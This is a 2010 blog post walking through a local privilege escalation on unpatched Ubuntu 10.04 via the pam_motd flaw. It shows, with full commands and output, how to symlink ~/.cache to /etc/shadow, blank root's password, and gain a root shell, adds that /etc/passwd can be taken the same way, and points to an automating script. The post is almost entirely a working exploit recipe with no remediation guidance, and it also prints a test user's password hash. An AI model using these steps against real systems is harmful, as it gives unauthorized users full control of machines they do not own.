Exploiting Ubuntu pam_motd vulnerability

July 12th, 2010

There is a PAM vulnerability in unpatched copies of Ubuntu. According to the Ubuntu (Article Here) it is an issue with the pam_motd module and it allows /etc/shadow to be modified by an unprivileged user. The shadow file is responsible for keeping the hashed copies of user passwords and is usually referenced in /etc/passwd with a single character of ‘x’.

I went ahead and installed a fresh copy of Ubuntu 10.04 Server in a VM to test this out with. The only modification I made was install ssh.

First thing we want to do is login


Ubuntu 10.04 LTS ubuntu tty1

ubuntu login: metacortex
Password:

Once I am in I go ahead and check my current uid


metacortex@ubuntu:~$ id
uid=1001(metacortex) gid=1001(metacortex) groups=1001(metacortex)

Now we can look and see what the default .cache directory contains


metacortex@ubuntu:~$ ls .cache/
motd.legal-displayed

It doesn’t really matter anyway because we are going to go ahead and get rid of it like so


metacortex@ubuntu:~$ rm -rfv .cache/
removed `.cache/motd.legal-displayed’
removed directory: `.cache’

Now to actually take advantage of the vulnerability, we are going to create a soft link to /etc/shadow in place of the .cache directory


metacortex@ubuntu:~$ ln -s /etc/shadow .cache
metacortex@ubuntu:~$ ls -alh
total 20k
drwxr-xr-x 2 metacortex metacortex 4.0k 2010-07-12 14:47 .
drwxr-xr-x 4 root root 4.0k 2010-07-12 14:42 ..
-rw-r–r– 1 metacortex metacortex 220 2010-04-18 20:15 .bash_logout
-rw-r–r– 1 metacortex metacortex 3.1k 2010-04-18 20:15 .bashrc
lrwxrwxrwx 1 metacortex metacortex 11 2010-07-12 14:47 .cache -> /etc/shadow
-rw-r–r– 1 metacortex metacortex 675 2010-04-18 20:15 .profile

With this soft link in place, we have full access to read and write to /etc/shadow


metacortex@ubuntu:~$ vim .cache

In VIM we will see the following


root:*:14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.es
pM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
“.cache” 24L, 839C 1,1 All

Now that we have write access to the shadow file, we can do whatever we want with it such as completly removing the root password like this


root::14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.es
pM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
“.cache” 24L, 839C 1,1 All

After we save it, we need to re-invoke pam_motd by logging in again


metacortex@ubuntu:~$ ssh localhost
Password:

Now we can feel free to log in as root whenever we would like


metacortex@ubuntu:~$ su -
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#

I am not sure of the exact technical details as to whats wrong with pam_motd but from what I can tell it allows the motd root access. What I can not figure out is why it does not work the same for /etc/passwd.

*EDIT*
I may have forgotten to re-invoke pam_motd after changing the soft link from shadow to passwd. I am able to own /etc/passwd just as easily as /etc/shadow. I also found this nice little shell script that automates it at packetstorm.

Comments are closed.

 
     
); ?http://www.statcounter.com/free_hit_counter.html